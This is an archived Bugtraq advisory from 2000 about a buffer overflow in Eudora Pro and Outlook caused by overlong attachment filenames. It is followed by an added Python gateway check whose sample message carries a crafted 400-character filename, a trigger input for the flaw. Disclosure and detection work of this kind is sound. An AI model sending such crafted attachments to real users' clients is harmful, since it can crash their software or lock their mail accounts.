[14904] in bugtraq
Eudora Pro & Outlook Overflow - too long filenames again
daemon@ATHENA.MIT.EDU (Ultor)
Mon May 15 16:26:06 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0025_01BFBE7D.AF603310"
Message-Id: <002801bfbe6c$eccd5bd0$0100a8c0@ultor>
Date: Mon, 15 May 2000 14:56:00 +0200
Reply-To: Ultor <Ultor@HERT.ORG>
From: Ultor <Ultor@HERT.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0025_01BFBE7D.AF603310
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
==== APPLICATIONS AFFECTED
Qualcomm Eudora Pro (all versions)
Outlook Express 4.*
Microsoft Outlook 98
Eudora Light and Outlook Express 5.0 are NOT affected
==== DESCRIPTION
These e-mail/news programs improperly handle the filenames of files attached
to e-mails. A filename that is too long can result in a buffer overflow
condition when the program processes the attachment and tries to save the
temporary file. As the reader generally processes the attachments when the
user reads the message, the buffer overflow condition can be initiated.
In Outlook, if the filename has a graphic file extension, the buffer overflow
condition can be initiated when trying to view the message (my last post on
BUGTRAQ); if not, the overflow will occur if the user tries to save/open the
attached file.
In Eudora Pro, e-mail is processed while downloading mail from the server, so
the buffer overflow occurs when the message is processed from the spool
directory. This can even lock the e-mail account for Eudora Pro users. As far
as I know, the same problem is in the Microsoft Outlook 98 version.
==== EXAMPLE
Example Outlook e-mails are attached to this message (sorry to all Eudora Pro
users for the latest problems).
==== EXPLOITATION
possible ... have fun =)
==== PATCHES
If you use Outlook 98 or 4.*, then change to the 5.* version. If you like the
Eudora style, then use Eudora Light or wait for Eudora Pro patches.
PS. In my opinion, saving temporary files with the same filenames as the files
attached to the e-mail is very lame. They should use random filenames.
==== CREDITS
Greetz for noticing that Eudora Pro is vulnerable to the same bug as Outlook to:
Felicia Catherine Kaye <feline@feline.pp.se>
Michael Smith <mike@icon.co.za>
Greeetz to HERT,Lam3rZ,TESO
----------------------
Mark Bialoglowy [Ultor@hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
------=_NextPart_000_0025_01BFBE7D.AF603310
Content-Type: application/x-zip-compressed;
name="lfilename_bug.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="lfilename_bug.zip"
------=_NextPart_000_0025_01BFBE7D.AF603310--
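
Added example (not part of the original post or of any vendor's code): a mail-gateway style check that flags attachments whose declared filename exceeds a length limit before a client ever processes them, plus a storage name that ignores the sender-chosen name, as the PS above suggests. The 255-character limit, the function names and the sample message are assumptions constructed for illustration.

```python
import secrets
from email import message_from_string
from email.utils import collapse_rfc2231_value

MAX_NAME_LEN = 255  # assumed gateway policy; the post states no exact length

# Constructed sample: one ordinary attachment and one whose overlong name is
# split across RFC 2231 continuation parameters (filename*0, filename*1).
SAMPLE = "\n".join([
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="b1"',
    "",
    "--b1",
    'Content-Type: text/plain; name="notes.txt"',
    'Content-Disposition: attachment; filename="notes.txt"',
    "",
    "hello",
    "--b1",
    "Content-Type: image/jpeg",
    "Content-Disposition: attachment;",
    ' filename*0="' + "A" * 200 + '";',
    ' filename*1="' + "A" * 200 + '.jpg"',
    "",
    "x",
    "--b1--",
    "",
])

def declared_names(part):
    """Every filename a MIME part declares, from both header locations."""
    names = []
    for param, header in (("filename", "content-disposition"),
                          ("name", "content-type")):
        raw = part.get_param(param, header=header)
        if raw is not None:
            # Joins continuations and decodes RFC 2231 charset tuples.
            names.append(collapse_rfc2231_value(raw))
    return names

def overlong_attachments(raw_message, limit=MAX_NAME_LEN):
    """Return (part_index, name_length) for each declared name over `limit`."""
    hits = []
    for idx, part in enumerate(message_from_string(raw_message).walk()):
        hits += [(idx, len(n)) for n in declared_names(part) if len(n) > limit]
    return hits

def storage_name():
    """Temp-file name that ignores the sender-chosen attachment name."""
    return "att-" + secrets.token_hex(16) + ".tmp"
```

Checking both the Content-Disposition `filename` and the Content-Type `name` parameter matters because a client may read either one, and measuring after continuation reassembly catches names that look short line by line.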